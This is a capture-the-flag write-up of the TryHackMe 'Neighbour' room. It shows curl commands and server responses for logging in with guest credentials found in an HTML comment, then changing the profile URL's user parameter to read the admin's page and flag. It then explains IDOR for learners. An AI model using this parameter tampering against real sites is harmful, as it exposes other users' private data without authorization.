CTF Writeups & Bug Bounty » Try Hack Me » THM Challenges » Neighbour Writeup – Easy IDOR TryHacKme Room
In this writeup, we are going to solve step by step a TryHackMe room called “Neighbour”. It’s an IDOR-focused challenge on TryHackMe.
» Link to the room on TryHackMe
Table of Contents
TryHackMe Neighbour Scenario
Here is the scenario from TryHackMe:
Check out our new cloud service, Authentication Anywhere — log in from anywhere you would like! Users can enter their username and password, for a totally secure login process! You definitely wouldn’t be able to find any secrets that other people have in their profile, right?
Our goal is the following:
Find the flag on your neighbor’s logged in page!
Let’s see!
Recon – Finding the IDOR
To make things a little bit harder, firefox refused to work on the TryHackMe attack box! We’ll be doing everything with curl.
First, let’s see what the website on port 80 returns:
root@ip-10-82-135-87:~# curl -skLi 10.82.160.30
HTTP/1.1 200 OK
Date: Thu, 22 Jan 2026 10:55:49 GMT
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.19
Set-Cookie: PHPSESSID=847d83810f43888794452ceae84c45e4; path=/
[...]
<form action="/index.php" method="post">
<div class="form-group">
<label>Username</label>
<input type="text" name="username" class="form-control " value="">
<span class="invalid-feedback"></span>
</div>
<div class="form-group">
<label>Password</label>
<input type="password" name="password" class="form-control ">
<span class="invalid-feedback"></span>
</div>
<div class="form-group">
<input type="submit" class="btn btn-primary" value="Login">
</div>
<p>Don't have an account? Use the guest account! (<code>Ctrl+U</code>)</p>
<!-- use guest:guest credentials until registration is fixed. "admin" user account is off limits!!!!! -->
</form>
[...]
curl options used:
- -s: silent mode
- -k: allows insecure connections
- -L: follows redirect
- -i: shows response headers
Great, it’s an Apache server running PHP. It has a form and apparently, from the HTML comments, guest credentials can be used.
Let’s send the POST request with those credentials:
root@ip-10-82-135-87:~# curl -skLi -X POST -d "username=guest&password=guest" http://10.82.160.30/login.php -b "PHPSESSID=95fee1d0438578c4075c131e0da037ec"
HTTP/1.1 302 Found
Date: Thu, 22 Jan 2026 10:58:45 GMT
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.19
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: profile.php?user=guest
[...]
Notice the Location header from the server, we are redirected to /profile.php?user=guest.
If the profile.php program displays the profile from the user specified in the “user” parameter, we could be able to display other profiles by simply providing their usernames in the URL.
Exploiting IDOR – Showing admin’s profile
This is exactly what we’re going to do: using our session cookie returned previously in the Set-Cookie header, we are going to try to access the admin profile:
root@ip-10-82-135-87:~# curl -skLi http://10.82.160.30/profile.php?user=admin -b "PHPSESSID=95fee1d0438578c4075c131e0da037ec"
HTTP/1.1 200 OK
Date: Thu, 22 Jan 2026 11:00:09 GMT
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.19
[...]
<h1 class="my-5">Hi, <b>admin</b>. Welcome to your site. The flag is: flag{66be***************************}</h1>
[...]
Well, it was easier than expected!
We indeed have access to the admin’s profile and the flag is in the description.
Zoom on IDOR
But what is IDOR actually?
IDOR means “Insecure Direct Object Reference”. Which means nothing.
Let’s see in this TryHackMe example: the “user” parameter was the vector for IDOR.
The profile page was using this parameter to display information.
It was insecure because no checks were performed (anyone could see admin’s profile).
This user parameter was the object referencing to the profile we wanted to display.
Overall, we were able to access someone else’s information by manipulation the object that the program uses as a reference.
IDOR is a very well known vulnerability that can happen pretty much anywhere, often in the form of IDs:
- In URLs
- In APIs
- In HTTP Headers
- In HTTP Cookies
- In form data
- etc.
Here, it was directly inside the URL.
Final Thoughts – “Neighbour”, a good intro to IDOR
Overall, this TryHackMe room was very straightforward and focused on the IDOR.
One could exploit it without even knowing about IDOR, just changing the user parameter based on intuition, or to test.
It’s a great thing that TryHackMe links resources towards their OSINT teachings so beginners can learn more after having a pratical exploitation in the room.
Overall, cool challenge! Hope you learned something.
More Resources from PentestGuides
- ftp Complete Tutorial in 10 Examples – Must-know Command for CTF
Learn FTP in 10 simple examples, from connecting to uploading and downloading files. See how hackers steal FTP password and what are the secure alternatives - scp Quick Tutorial – Transfer Files Securely Over SSH
Complete scp tutorial: transfer files and folders securely over SSH. All the main options of scp are covered and pre-made scp commands are provided. - curl Quick Tutorial – Everything You Need to Know
Complete curl tutorial: send HTTP GET and POST requests, interact with JSON API, send files, use custom HTTP headers, download files, etc. - Netcat (nc) Full Tutorial – Easy TCP/UDP Guide
Practical netcat (nc) guide for Linux: reverse shells, TCP/UDP connections, port scanning, file transfers, and key options for CTF and Pentesting. - nmap Tutorial – the Ultimate Network Scanner
Master nmap with thist tutorial, from basic host discovery, port and service scanning to more advanced techniques like firewall evasion
Disclaimer
This article is provided for educational purposes only.
All techniques demonstrated were performed in a controlled lab environment.
Do not attempt to reproduce these actions on systems you do not own or have explicit authorization to test.
I do not encourage or take responsibility for any illegal use of the information provided.